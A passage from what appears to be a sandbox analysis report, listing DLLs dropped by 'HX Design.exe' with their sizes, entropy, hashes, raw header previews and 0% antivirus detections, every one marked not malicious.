                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.615532076636106
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x91WthW/WEXCVWQ4OWNtu6bXKDUX01k9z3Alh1ELcNm:x91WthWU6tTbXpR9zq4cM
                                                                                                                                                                                                                                                    MD5:4166D703ABC9C6DE65D5B269D3A5425E
                                                                                                                                                                                                                                                    SHA1:16BCD7191312B94BDF38368D188E5A5CC479A36C
                                                                                                                                                                                                                                                    SHA-256:0A351C2A2889A42886017E7DBCF75F45E3CB24D2F55E72205624272487E4A056
                                                                                                                                                                                                                                                    SHA-512:F722DBA410CAB727C753E9CCE0BC47663E22F45828F5DF0BAC5BD6331497A2F15F6D9330B5203D3FF735F1CE6397E63C1B21D3EA6C5CEAB817B5F83EC296882B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....x..........." ...&.....0...............................................@............`A........................................p...`............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22072
                                                                                                                                                                                                                                                    Entropy (8bit):4.723784724963796
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xHl4xlRWthWKWJWadJCsVWQ4KWrN3Lrp0KBQfX01k9z3A3WX2HR+HM:xF4xlRWthWnCseRxB+R9zcWXY+s
                                                                                                                                                                                                                                                    MD5:993B5BC35DAC959BED58B77FE42AC77A
                                                                                                                                                                                                                                                    SHA1:2ABAD159CBAB86FF423D6446143427DAAB751366
                                                                                                                                                                                                                                                    SHA-256:B998FF8D173C34505E1D5984134282866DE910B09919CF9A322FCE760B75C80B
                                                                                                                                                                                                                                                    SHA-512:CA19E949DCC8460AF53C9DAD17995A0CBFFD971BB731B7FCB53BB9384D227357926231C9FADFAA5AEF09055BEBAE9D5C23EE73EB6ECA04D6A52A3DF0847E10AB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....2.........." ...&.....0...............................................@......o~....`A........................................p................0...............0..8&..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.648245476502366
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xf1W30WthWIWEXCVWQ4KWwkcADB6ZX01k9z3A5tXTV5KC:xw30WthWDRkcTR9z8VR
                                                                                                                                                                                                                                                    MD5:0B65672B91C6A12D769DD777F810B149
                                                                                                                                                                                                                                                    SHA1:2D527B45DCBE653A91E10365891C7E589F5E51E0
                                                                                                                                                                                                                                                    SHA-256:C09EB307B2EB747B73C516267A99A23BB73204452326D41BDEB6F43598F6D62E
                                                                                                                                                                                                                                                    SHA-512:F090BB0B8F3616CF2D77FF25523BC823918E1452F626A1298C95003DEF1867C785566A4E85CCD7F5A20F14631CAEC5DD392777DB2D00368C3FDF3597E0F51788
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@.......P....`A........................................p................0...............0..(&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.867148195183095
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xfTvuBL3BBLSWthWAWEXCVWQ4KWOTwKUWX01k9z3A6weTq:xfTvuBL3BEWthWbhk2R9zDwv
                                                                                                                                                                                                                                                    MD5:259B4186004BB41E706DD781E29F5C5B
                                                                                                                                                                                                                                                    SHA1:85751D31FE233ED51C46466F214F497D01BE8D87
                                                                                                                                                                                                                                                    SHA-256:B3BA83880986F2522D05A88C52FE69EDA9C9FADBC5192A063E36BBA777CC877F
                                                                                                                                                                                                                                                    SHA-512:F8A06252E96F40965668C978C4808305D424DE698F47F420643D713751926636F2049DD34C8156BA5BBBF5A5B2F4D5C19A978CF27D3AAEBD728D7A3DE8F0AFA2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...;Bq..........." ...&.....0...............................................@............`A........................................p................0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):5.345678115600106
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:xinaOMw3zdp3bwjGzue9/0jCRrndbwWthWods6YMTR9zFVJQMX:x3OMwBprwjGzue9/0jCRrndbjwg9zLJp
                                                                                                                                                                                                                                                    MD5:4C26932F8F1F490017ADD31F5EC0A533
                                                                                                                                                                                                                                                    SHA1:0DA01A7C89B506FE3FD939344BB51B976EFB3207
                                                                                                                                                                                                                                                    SHA-256:DD3843C2E46B4E926C36150D614EFE02CA0EBC1F767F64F471568ADC35C2EF23
                                                                                                                                                                                                                                                    SHA-512:EB2B87D187991FDC8E3A6577F20622D2D4A2A994DD375D8C27E1434CE786596533EACFBDE8714DB9959D88D6BCB91FDC8079C60C23F0EB920BA45C546A44E523
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...}i6..........." ...&.....0...............................................@......E.....`A........................................p................0...............0..@&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):4.761086240366231
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xsVWthWdWEXCVWQ4WWO6BzxOhJNlOCgX01k9z3Akfoc/wDb0:xsVWthWK36BzxIPaR9zvfJKb0
                                                                                                                                                                                                                                                    MD5:41E0B7CB0EECBA317CF321B1ADA084D7
                                                                                                                                                                                                                                                    SHA1:4CE1F13188FC00EB29C726717EAE489C524C1C8A
                                                                                                                                                                                                                                                    SHA-256:DB978830B1FBCC0521582A6A79864B0FD83179248FA374926C8097BC02CD6383
                                                                                                                                                                                                                                                    SHA-512:F0961CDE8DC83B845B2B91E42436ED8B42D2FB19CAAABF49B300FA9CBBAE9FAB84009B4714C3899AB4A703315A135A61E508DB29239D823A1CC11462CE6FFAB7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....n.g.........." ...&.....0...............................................@............`A........................................p...l............0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.693773969089426
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x+WthWTWEXCVWQ4OWbxVXC4dlgX01k9z3AUjkOLdtPCH+:x+WthWoUxVXC4deR9zVjrLPqe
                                                                                                                                                                                                                                                    MD5:7E751952F122F4E8BE1317087DC9DC71
                                                                                                                                                                                                                                                    SHA1:F65884C8CFBB8AD565B3DF3A51AF11B1617C7092
                                                                                                                                                                                                                                                    SHA-256:D078A9A9958A7C816DEA989BEF24F32BEFC6651AEA5E07F97A7B5D50DF73F799
                                                                                                                                                                                                                                                    SHA-512:960922AC1309BDCF42D6900A0BEA30D4096D1411EC6A97F328520D4A59F71FC04E6F4A7B8D2B346012530329F76897607369C8E1ED1FE9C589D7F7682987C043
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....~.N.........." ...&.....0...............................................@............`A........................................p................0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.879588348314022
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x88Fg9WthW2WEXCVWQ4OWkO8RwX01k9z3Avw0:xDFKWthWp69R9z4w0
                                                                                                                                                                                                                                                    MD5:6D0762A2BA4263D0901CA7AAA0725C0C
                                                                                                                                                                                                                                                    SHA1:E36D2D049116BD2D84121CDFA179098AC03650B4
                                                                                                                                                                                                                                                    SHA-256:2EE9434CC5F40F4514C7284E14B90DB5C7A33000AFDA834D7C1DC063BAA3D805
                                                                                                                                                                                                                                                    SHA-512:94616B2BFC0497CA2DBBC23C1AA4ECB04113A53D75FA570F6BB5E2561E5CDB940792E2CB290562133D226400C78D91377FDD312BA2858679084C66FF1AE9031D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@...........`A........................................p...H............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22096
                                                                                                                                                                                                                                                    Entropy (8bit):5.2236952682399105
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xuMck1JzX9cKSI/WthWGWJWadJCsVWQ4WWfFQXINFPKBWX01k9z3AHVjjL0+HG:xDck1JzNcKSI/WthWDCsR8KER9zMVg+m
                                                                                                                                                                                                                                                    MD5:ABAABC1DF36C7A0674F20FB83247FD71
                                                                                                                                                                                                                                                    SHA1:345DB0FFEA0CB2531B79D464AD69347AC71EE2B9
                                                                                                                                                                                                                                                    SHA-256:BA55F8481D8A9D225B8C430EB010F675250C5AFA64D9EEB15FF31DC159A19F5A
                                                                                                                                                                                                                                                    SHA-512:7C01B8F46E9FBE08784066A9DF03723B3485FA714F22F4AB7E1CBE719B0A91AB1A5D597EF9D567836375DE929EA9397CE0685F00B908F3D0AA4D0288EB59F7BA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....qm..........." ...&.....0...............................................@.......g....`A........................................p................0...............0..P&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21960
                                                                                                                                                                                                                                                    Entropy (8bit):4.766496851793983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x3IDfIe+WthWGWJWadJCsVWQ4iWoJtDoSJj+iX01k9z3A0FC3CHUrU:x3IDfIe+WthWDCsJtDX+iR9zHFC3C0rU
                                                                                                                                                                                                                                                    MD5:A6776C201BAAE1DD6F88048D7747D14C
                                                                                                                                                                                                                                                    SHA1:646119D2E440E6DAD0FFB0FE449AB4FC27F09FBE
                                                                                                                                                                                                                                                    SHA-256:EE99AF71C347FF53C4E15109CB597759E657A3E859D9530680EEEA8BB0540112
                                                                                                                                                                                                                                                    SHA-512:A9137AF8529FD96DBBA22C5179A16D112EC0BFAB9792BABE0A9F1CCA27408EFF73BA89F498CB5F941A5AA44555529EE10484E6CA4A3FBF1627523ACFDE622B45
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....x............" ...&.....0...............................................@............`A........................................p................0...............0...%..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.578458420956069
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xQYY/beLWthWsxWEXCVWQ4KWZTgY00pyEuX01k9z3AxMI2YcHv:xQYY/beLWthWsuogEpcR9zwrcP
                                                                                                                                                                                                                                                    MD5:FB731A1F96C9E34347CBA5BB18E54581
                                                                                                                                                                                                                                                    SHA1:88A62EDFBBD806B1043B4A1266C4708E1D47BE1D
                                                                                                                                                                                                                                                    SHA-256:C4C1D381F419731C848E4A20AEF02A4436758935C9A274896228B9451956CC8E
                                                                                                                                                                                                                                                    SHA-512:BE6C94D6015EDAE41FA0D6464C7DC5976ADBC3617E02B293B9A39E645EC173071F1F282959DDF264A133CE3B3BB9C434EB2E65FC607136F11D8EB07538168FFC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....|..........." ...&.....0...............................................@......V.....`A........................................p................0...............0..(&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22072
                                                                                                                                                                                                                                                    Entropy (8bit):4.745723861759547
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x6SGeV2WthWXWJWadJCsVWQ4KWBGkTehHssDX01k9z3AvjmJL7Du:x6SGeV2WthWOCsRkaFDR9zyjYLG
                                                                                                                                                                                                                                                    MD5:8AAD6A3A2FE9052EF218D5C8CE1995E1
                                                                                                                                                                                                                                                    SHA1:33748750E57CDC165FCDD186AE53003649607221
                                                                                                                                                                                                                                                    SHA-256:E44D56D10EE14D4C4767A25839C2EF6826ADBEA3E15C2705B1D79676A63905B4
                                                                                                                                                                                                                                                    SHA-512:841C70C63B243DEA68C2AC9CD886731B6171DCF76A60932191FB29402585D6BBFCC98D11868FC6032F08C29D8E0040A2B896C32C2FB4697BD54DEA2A52589AE6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@......y`....`A........................................p...<............0...............0..8&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):4.655259252823291
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xE6yMvr8WthW+WEXCVWQ4iWJZhMgiZTOebR5X01k9z3ACRsgf45I:xE6yMvIWthWRCZ+9bt5R9zxRsvI
                                                                                                                                                                                                                                                    MD5:2EBACBBDA70B888B1BCC5E816D14F3A2
                                                                                                                                                                                                                                                    SHA1:EBF1763B0CEE267040312DECCB3DAD61AF1B9CF4
                                                                                                                                                                                                                                                    SHA-256:96B11FA8ACA734F4B1DDEE377C84427D384F8E06AFFD99C63128797289FC9304
                                                                                                                                                                                                                                                    SHA-512:AF15FC2B1FF31A3550AE4E9AE45F7BBE728D839B288D6DC5F04859E27463ED946D5B2619736223AE401CEE504E683B9FE9DFFB65754280644DDA91527EB46C5E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....~S..........." ...&.....0...............................................@............`A........................................p................0...............0..@&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):5.1327739610127425
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:xUZwidv3V0dfpkXc0vVapwWthWVEi3au0R9zwpUbF:xOHdv3VqpkXc0vVaJGXKu49zbF
                                                                                                                                                                                                                                                    MD5:87C57EDDF837C1E7AAADDB451D3D981E
                                                                                                                                                                                                                                                    SHA1:5287AF84CA9CDFA928355C3C899A43051169A2FD
                                                                                                                                                                                                                                                    SHA-256:E65305C73E3540491A0C62103764D50D827A13D749F76CB2AF593A800C93CF44
                                                                                                                                                                                                                                                    SHA-512:0900608072D807082087275BD71061F7118534EA20D4CBD9B0E8190F500CD57FEABE0BF7F9FAC6438A7C4655AC405DD4EC17FD5F1A48B4F5DC70EB25E6F0E8AE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...ld............" ...&.....0...............................................@......z.....`A........................................p...X............0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.820265064542297
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xMtZ3uWthWSWEXCVWQ4OWkguf8RwX01k9z3Avuqr:xMtZ3uWthWFVf9R9z4Lr
                                                                                                                                                                                                                                                    MD5:2914EA20C9B8D79B1E98EA6B6DD85450
                                                                                                                                                                                                                                                    SHA1:2E25617BB4F3F6391658B5778F5248D9E6762C6B
                                                                                                                                                                                                                                                    SHA-256:047D09B49DAE9A101EB55277AA37C31390EA6C7187379B448122D77BD77BF005
                                                                                                                                                                                                                                                    SHA-512:C0731AAECBCA9B70151E7630E0DBC7D744D534EFFE56AD703DF881F09C7820CB143873DBF95D57357D51BE44D53A3B9862D0C6483CA6C70AAD01A3F11350ABC9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...k............." ...&.....0...............................................@............`A........................................p...x............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21944
                                                                                                                                                                                                                                                    Entropy (8bit):4.856010194095184
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xIgdKIMF6mayWthWkWEXCVWQ42WmrDoSJj+iX01k9z3A0FCzzY:xl37yWthWvxrDX+iR9zHFCHY
                                                                                                                                                                                                                                                    MD5:E496D42D228B5E90C7B96350DBB1159C
                                                                                                                                                                                                                                                    SHA1:746BA35A931E05AEBDA957608A6E28C1699237AA
                                                                                                                                                                                                                                                    SHA-256:1FF617FB9D681551FB456AABAAE078C0AC7F96580AC1144EA441826A6D98CAEF
                                                                                                                                                                                                                                                    SHA-512:CE555CB7FC0625D7568B002306E203E013F03127AAD7383CE26774CB1F1FA820F5FA6145DC9F5930B4D0791631BDBCE2EE2E4EE3EFA7720B1B2C413FF782E197
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....F.........." ...&.....0...............................................@.......<....`A........................................p...H............0...............0...%..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):4.82505810266902
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xEVWthWQWEXCVWQ4WWjqYl6d3RX01k9z3AQvjc22sxGy9:xEVWthWL8qYlORR9zz4w9
                                                                                                                                                                                                                                                    MD5:10D466341E7ECE8CF75B5D026105741B
                                                                                                                                                                                                                                                    SHA1:31D1E9B9A4511156695B5AA33D65B6A36F8139C2
                                                                                                                                                                                                                                                    SHA-256:5CE391EDB33C7055E724A4C3CECC64D16BA2AA4724CB99CD5AED00B0CECFBC82
                                                                                                                                                                                                                                                    SHA-512:8778FD10C7360BD87DB048A2B2CA6603455FD8CB4D0E18709F106B55DB7CC92E7D6DC45385FF9DEF445B368376462E7D253442728D5E759FAA97299B67A59E21
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...z5............" ...&.....0...............................................@............`A........................................p...H............0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21944
                                                                                                                                                                                                                                                    Entropy (8bit):4.5765948112646
